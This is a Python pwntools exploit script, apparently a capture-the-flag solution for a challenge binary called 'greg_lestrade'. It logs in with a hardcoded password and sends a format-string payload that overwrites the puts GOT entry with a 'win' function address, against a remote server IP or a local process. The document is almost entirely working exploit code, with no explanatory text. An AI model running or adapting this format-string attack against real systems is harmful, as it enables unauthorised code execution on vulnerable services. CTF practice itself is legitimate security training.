Rating:
```python
from pwn import *
from sys import argv
context(os='linux', arch='amd64', log_level='info')
if len(argv) > 1:
if argv[1][0] == 'r':
r = remote('146.185.132.36', '12431')
elif argv[1][0] == 'l':
r = remote('localhost', 6000)
else:
r = process('./greg_lestrade')
def fsa64(offset, over_write_addr):
payload = b""
tmp = [j for j in p64(over_write_addr)]
payload += "%{}c%{}$hhn".format(tmp[0] + (0x100 - len(payload)), offset).encode()
offset += 1
payload += "%{}c%{}$hhn".format(tmp[1] + (0x100 - tmp[0]), offset).encode()
offset += 1
payload += "%{}c%{}$hhn".format(tmp[2] + (0x100 - tmp[1]), offset).encode()
offset += 1
payload += "%{}c%{}$hhn".format(tmp[3] + (0x100 - tmp[2]), offset).encode()
offset += 1
payload += "%{}c%{}$hhn".format(tmp[4] + (0x100 - tmp[3]), offset).encode()
offset += 1
payload += "%{}c%{}$hhn".format(tmp[5] + (0x100 - tmp[4]), offset).encode()
offset += 1
payload += "%{}c%{}$hhn".format(tmp[6] + (0x100 - tmp[5]), offset).encode()
offset += 1
payload += "%{}c%{}$hhn".format(tmp[7] + (0x100 - tmp[6]), offset).encode()
offset += 1
return payload
def main():
puts_got = 0x0602020
win_fun = 0x40087a
passwd = "7h15_15_v3ry_53cr37_1_7h1nk"
# fmtarg = 58
payload = b"a" * 256
payload += fsa64(58, win_fun)
payload += b"x" * (400 - len(payload))
payload += p64(puts_got)
payload += p64(puts_got+1)
payload += p64(puts_got+2)
payload += p64(puts_got+3)
payload += p64(puts_got+4)
payload += p64(puts_got+5)
payload += p64(puts_got+6)
payload += p64(puts_got+7)
r.sendlineafter('Credential :', passwd)
r.sendlineafter('1) admin action', "1")
r.sendlineafter('command :', payload)
print(r.recvall())
if __name__ == '__main__':
main()
```